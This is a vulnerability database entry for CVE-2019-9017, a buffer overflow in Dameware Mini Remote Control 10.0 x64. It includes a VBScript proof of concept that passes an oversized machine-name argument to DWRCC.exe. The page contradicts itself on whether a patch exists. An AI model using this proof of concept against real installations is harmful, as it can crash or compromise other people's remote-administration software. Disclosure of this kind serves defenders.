Buffer Overflow Vulnerability in Dameware Mini Remote Control

vendor:

Dameware Mini Remote Control

by:

Dino Barlattani

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Dameware Mini Remote Control

Affected Version From: 10.0 x64

Affected Version To: 10.0 x64

Patch Exists: NO

Related CWE: CVE-2019-9017

CPE: a:solarwinds:dameware_mini_remote_control:10.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/solarwinds-dameware_mini_remote_control-cve-2019-9017/

Other Scripts:

Platforms Tested: Windows

2019

Buffer Overflow Vulnerability in Dameware Mini Remote Control

The DWRCC executable file in Dameware Mini Remote Control version 10.0 x64 is affected by a buffer overflow vulnerability. The buffer size passed in the machine name parameter is not checked, allowing an attacker to pass a buffer to the machine host name parameter.

Mitigation:

Update to a patched version of Dameware Mini Remote Control.

Source

Exploit-DB raw data:

#Vendor:     Solarwinds
#Site Vendor:    https://www.dameware.com/
#Product:     Dameware Mini Remote Control
#Version:    10.0 x64
#Platform:    Windows
#Tested on:    Windows 7 SP1 x64
#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector:    pass buffer to the machine host name parameter

#Author:    Dino Barlattani dinbar78@gmail.com
#Link:        http://www.binaryworld.it

#CVE ID:    CVE-2019-9017

#POC in VB Script

option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
    buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
    fold = fold & exe
    fold = chr(34) & fold & chr(34)
    result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if